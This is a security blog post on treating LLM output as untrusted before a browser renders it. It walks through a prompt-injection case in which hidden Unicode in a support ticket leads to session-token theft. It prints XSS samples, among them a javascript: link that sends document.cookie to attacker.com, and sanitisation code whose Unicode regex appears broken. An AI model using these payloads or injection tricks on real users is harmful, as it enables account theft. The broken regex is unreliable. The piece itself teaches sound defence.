Your Frontend Rendered It. Nobody Asked What the LLM Actually Sent.
A SaaS company ships a customer-facing AI assistant. The frontend is a clean React application — well-structured, properly componentized, reviewed by three senior engineers. The response streams in from the API, parses cleanly through the markdown renderer, and appears in the chat window exactly as designed.
Three weeks later, a security researcher files a report. A specific input — a support ticket containing instructions embedded in invisible Unicode characters — caused the AI assistant to include a hidden redirect payload in its response. The markdown renderer faithfully rendered it. The user's browser executed it. Session tokens left the building.
The LLM didn't write malware. It was manipulated into including content that the frontend rendered without question. Nobody had reviewed what the LLM was actually returning before it hit the renderer.
This is the gap. It's not exotic. It's architectural — and it exists in the majority of LLM-powered applications shipped today.

The Trust Boundary That Got Misplaced
Traditional web security has a well-established principle: never trust user input. Sanitize it, validate it, escape it before it touches your DOM. This is so foundational that modern frameworks enforce it by default — React escapes by default, parameterised queries prevent SQL injection, CSP headers constrain script execution.
The mental model breaks the moment an LLM enters the stack.
Most teams make an implicit assumption when wiring an LLM API into their application: the LLM is part of our system, therefore its output is trusted system output.
This assumption is wrong in three distinct ways:
First: The LLM is not deterministic. The output space of a large language model is effectively unbounded — it can produce any text that is statistically plausible, including text that looks like HTML, text that looks like JavaScript, and text that contains Unicode control characters or bidirectional overrides that mean nothing in your monitoring dashboard but mean something specific to a browser renderer.
Second: The LLM processes external content. If your application allows users to paste content into prompts — support tickets, emails, documents — that external content enters the model's reasoning context. A well-designed prompt injection payload embedded in a customer email can cause the model to include attacker-controlled content in its response. That response then gets rendered by your trusted frontend.
Third: The LLM has no concept of your application's security boundaries. It doesn't know that a markdown link in its response will render as a clickable anchor tag. It doesn't know that certain Unicode sequences will be interpreted differently by different renderers. It generates text. What your application does with that text is entirely your responsibility.
The trust boundary was in the wrong place. LLM output is not trusted system output — it is third-party content that should be treated with the same suspicion you'd apply to user-supplied content.
What the LLM Is Actually Capable of Returning
Developers who haven't thought about this category of vulnerability often assume that LLM outputs are benign text. They are not.
Markdown injection via link targets:
A model that includes a link in its response generates markdown that your renderer processes. If the link target is javascript:fetch('https://attacker.com/?c='+document.cookie), your markdown renderer may produce an anchor tag that executes JavaScript when clicked.
<!-- The model returned this (from injected instructions): -->
For more information, [click here](javascript:alert(document.cookie))
React's dangerouslySetInnerHTML would execute this. Many markdown libraries produce raw HTML that would too.
Unicode bidirectional override attacks:
Unicode contains directional control characters (U+202E, U+200F) that change how text is rendered. A sequence of visible characters can be made to display as different characters by inserting these control characters. Code snippets in AI-generated content can be manipulated to display safe code while containing malicious code.
Hidden instruction exfiltration:
A model that has been successfully prompt-injected may attempt to exfiltrate data through the URL parameters of rendered links, through image src attributes that trigger requests to attacker-controlled servers, or through encoded content in response fields that a downstream component decodes and executes.
Structured output manipulation:
If your application uses the model's JSON output to populate UI components, an injected response might include values that, when rendered, trigger XSS or UI manipulation. Example: a username field containing <script>malicious code</script> that gets rendered without sanitisation.

The Output Sanitisation Layer
The fix is treating LLM output as untrusted input and applying the same sanitisation you apply to user-submitted content.
Step 1: Strip dangerous HTML before rendering
Before any LLM response reaches your markdown renderer or is inserted into the DOM, pass it through a sanitisation library:
import DOMPurify from 'dompurify';
function sanitizeLLMResponse(rawResponse) {
return DOMPurify.sanitize(rawResponse, {
ALLOWED_TAGS: ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'code', 'pre', 'h1', 'h2', 'h3'],
ALLOWED_ATTR: ['class'],
// Block all href and src attributes by default
FORBID_ATTR: ['href', 'src', 'onerror', 'onload', 'onclick'],
});
}
Step 2: Sanitise markdown links specifically
If your application renders markdown and should allow links, validate link targets explicitly:
import { marked } from 'marked';
const renderer = new marked.Renderer();
renderer.link = (href, title, text) => {
// Only allow https:// links to trusted domains
const allowedPrefixes = ['https://'];
const isSafe = allowedPrefixes.some(prefix => href?.startsWith(prefix));
if (!isSafe) {
// Render as plain text, not a link
return text;
}
return `<a href="${href}" rel="noopener noreferrer" target="_blank">${text}</a>`;
};
Step 3: Strip Unicode control characters
function stripUnicodeControlCharacters(text) {
// Remove bidirectional override characters and other control characters
return text.replace(/[---]/g, '');
}
Step 4: Validate structured outputs before use
If the model returns JSON that populates UI elements, validate the schema before rendering:
import { z } from 'zod';
const ProductRecommendationSchema = z.object({
title: z.string().max(200),
description: z.string().max(1000),
// Explicit field validation — no unexpected fields can reach the UI
});
function validateLLMStructuredOutput(rawOutput) {
try {
return ProductRecommendationSchema.parse(JSON.parse(rawOutput));
} catch {
// Log the invalid response and return a safe fallback
logger.warn('LLM returned invalid structured output', { raw: rawOutput });
return null;
}
}
Content Security Policy as a Defence Layer
CSP headers don't prevent LLM output manipulation, but they limit the blast radius if something does execute:
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-{random}';
style-src 'self' 'unsafe-inline';
img-src 'self' https: data:;
connect-src 'self' https://api.openai.com;
object-src 'none';
base-uri 'self';
A strict CSP prevents inline script execution even if an attacker somehow injects <script> tags into the rendered content. It is not a replacement for output sanitisation — it is a fallback when sanitisation fails.
The Complete Checklist
Before shipping any LLM-powered feature that renders model output in the browser:
- Apply HTML sanitisation (DOMPurify or equivalent) to all LLM responses before rendering
- Validate markdown link targets against an allowlist of allowed URL schemes
- Strip Unicode control and directional characters from all response text
- Validate structured JSON outputs against a defined schema before using values in the UI
- Implement a strict Content Security Policy that blocks inline script execution
- Test your sanitisation with known payloads:
javascript:links,<script>tags, bidirectional override sequences - Log raw LLM responses server-side before sanitisation so you can audit what the model actually returned
The trust boundary didn't disappear when the LLM arrived. It got misplaced. LLM output that has processed untrusted user content is not trusted system output — it requires its own sanitisation gate.





